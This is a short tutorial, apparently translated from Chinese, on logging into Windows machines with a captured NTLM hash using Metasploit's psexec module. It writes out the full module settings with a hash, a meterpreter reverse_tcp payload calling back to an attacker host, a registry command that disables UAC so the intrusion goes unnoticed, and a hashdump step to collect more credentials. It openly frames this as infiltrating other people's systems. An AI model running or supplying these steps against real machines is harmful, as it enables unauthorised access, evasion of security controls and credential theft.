Preface
We sometimes get the user's hash value but cannot solve the password correctly. This is because hash decoding requires collision and the probability of success is not particularly high. Therefore, we use another method to log in to the target system directly using the hash value. .
Utilization process
The premise is that we have obtained the SYSTEM permission of the target system, and then we use the psexec module under smb
use exploit/windows/smb/psexec
set rhosts 192.168.75.139
set smbuser pyh(普通管理员账户)
set smbpass aad3b435b51404eeaad3b435b51404ee:588feb889288fb953b5f094d47d1565c
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.75.128
set lport 3333
show options
run
After executing the attack, it was discovered that our attack was blocked by UAC.
Here are two ways to turn off UAC. The first is to directly manage the user and account in the control panel of the Windows system, manage the user control settings, and then adjust it to the lowest level.
But considering that you are infiltrating other people's systems, it is impossible to notify others to turn off the firewall first, so that our whereabouts will be exposed, so I recommend using the second method to change the total value of the UAC registry through the shell obtained.
After entering the shell, execute reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
, the path symbol must be written correctly, that is the location of UAC in the registry. After the
modification is successful, shutdown -g
restart the computer. Before that, I recommend using the hashdump module to guess the common password.
use post/windows/gather/hashdump
set session 4
run